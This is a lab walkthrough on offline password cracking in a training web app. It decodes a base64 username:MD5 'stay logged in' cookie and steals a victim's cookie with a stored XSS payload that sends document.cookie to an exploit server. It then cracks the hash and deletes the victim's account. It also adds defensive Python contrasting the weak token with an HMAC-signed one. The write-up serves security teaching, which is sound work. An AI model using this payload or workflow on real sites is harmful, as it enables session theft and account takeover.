Offline password cracking

Lab description

Walkthrough

Step 1: Initial Analysis

Log in using the provided credentials (wiener:peter) and ensure the "Stay logged in" checkbox is selected. After logging in, inspect the HTTP request for the stay-logged-in cookie. The token appears to be encoded.

Step 2: Decoding the Token

Decode the token using Base64. The structure of the token is revealed as: username:MD5(password)

  • Decoded Token Example: wiener:51dc30ddc473d43a6011e9ebba6ca770

Step 3: Stealing Carlos's Cookie

The goal now is to steal Carlos's stay-logged-in cookie using the XSS vulnerability in the comment section. Submit the following XSS payload in the comment field:

<script>
document.location='//<your-exploit-server>/'+document.cookie;
</script>

This payload sends the cookies of whoever views the comment to our exploit server.

When Carlos views the comment, his cookie is sent to your exploit server.

Step 4: Extracting Carlos's Token

Access the exploit server logs to retrieve Carlos's stay-logged-in cookie.

  • Carlos's Token Example: Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz

Decode Carlos's token using Base64: carlos:26323c16d5f4dabff3bb136f2460a943

This confirms the same structure as before: base64(carlos:MD5(password)). Because the MD5 is unsalted and sits in a client-held cookie, anyone who obtains the cookie can attack the hash offline.

Step 5: Cracking Carlos's Password

Use an MD5 cracker (in this case Crackstation) to crack the hash. The hash 26323c16d5f4dabff3bb136f2460a943 resolves to: onceuponatime
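As an added example (not part of the lab or this write-up), the Python below decodes the cookie format, shows that an unsalted MD5 in a client-held token lets a stolen cookie be verified offline, and contrasts it with an HMAC-signed random token. The issue_token/verify_token functions are an assumed hardened design, not the lab's code.

```python
import base64
import binascii
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Carlos's stay-logged-in cookie exactly as captured in the walkthrough above.
CARLOS_COOKIE = "Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz"


def decode_stay_logged_in(cookie: str) -> Tuple[str, str]:
    """Decode the lab's cookie format: base64(username:MD5(password))."""
    username, _, digest = base64.b64decode(cookie).decode().partition(":")
    return username, digest


def password_matches(md5_hex: str, candidate: str) -> bool:
    """Unsalted MD5 means a cookie holder can confirm a guess offline, instantly."""
    return hashlib.md5(candidate.encode()).hexdigest() == md5_hex


# Hardened alternative (assumed design, not the lab's): the cookie carries a random
# nonce and an HMAC over username+nonce, so nothing password-derived ever leaves the
# server. Recording issued nonces server-side would additionally allow revocation.
def issue_token(username: str, server_key: bytes) -> str:
    nonce = secrets.token_hex(16)
    mac = hmac.new(server_key, f"{username}:{nonce}".encode(), "sha256").hexdigest()
    return base64.b64encode(f"{username}:{nonce}:{mac}".encode()).decode()


def verify_token(cookie: str, server_key: bytes) -> Optional[str]:
    """Return the username if the MAC verifies; None for malformed or forged tokens."""
    try:
        username, nonce, mac = base64.b64decode(cookie).decode().split(":")
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return None
    expected = hmac.new(server_key, f"{username}:{nonce}".encode(), "sha256").hexdigest()
    return username if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    user, digest = decode_stay_logged_in(CARLOS_COOKIE)
    print(user, digest)                               # carlos 26323c16d5f4dabff3bb136f2460a943
    print(password_matches(digest, "onceuponatime"))  # True
    key = secrets.token_bytes(32)
    tok = issue_token("carlos", key)
    print(verify_token(tok, key), verify_token(tok, b"wrong-key"))  # carlos None
```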

Step 6: Logging in as Carlos

Use Carlos's username and cracked password (carlos:onceuponatime) to log in.

  • Navigate to the "My Account" page and select "Delete account."

  • Enter the password when prompted and confirm the deletion.

To solve the lab we have to delete Carlos's account, so we click "Delete account", enter the password we cracked, and the lab is solved.
